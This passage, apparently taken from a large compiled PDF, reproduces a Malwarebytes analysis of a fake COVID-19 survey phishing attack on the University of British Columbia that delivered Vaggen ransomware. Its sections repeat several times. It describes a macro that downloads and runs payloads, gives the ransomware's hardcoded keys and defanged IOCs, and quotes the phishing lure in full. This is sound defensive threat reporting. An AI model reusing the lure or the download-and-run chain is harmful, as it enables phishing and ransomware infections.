Opening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event.
This can be very useful as an early warning notification system that an intruder has had access to a network.
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.
Vaggen ransomware
After being deployed, the ransomware starts encrypting the user’s files, adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop demanding a payment equivalent to 80 USD, to be paid in Bitcoin.
The ransomware appears to be coded from scratch and is a relatively straightforward application written in Go, which starts with the function denoted as ‘main_main’.
Other functions belonging to the main application have obfuscated names, such as main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA and main_SPRINGA. Three of them map to the following operations:
main_LAMNARDETTA -> main_enumDir
main_ELDBJORT -> main_encryptFile
main_SPRINGA -> main_encryptAndRen
A full list of the functions, along with their RVAs, can be found here.
Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64; the XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.
Encrypting and renaming of the files is implemented as the callback of the standard Go library function filepath.Walk (package path/filepath).
Files are encrypted with AES-256 (32-byte key) in GCM mode.
The encryption algorithm is similar to the one demonstrated here.
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 710 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 711 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 712 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 713 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 714 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 715 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 716 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 717 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 718 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 719 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 720 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 721 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 722 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 723 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 724 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 725 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 726 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 727 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 728 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 729 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 730 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 731 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 732 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 733 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 734 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 735 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 736 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 737 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 738 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 739 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 740 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 741 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 742 of 
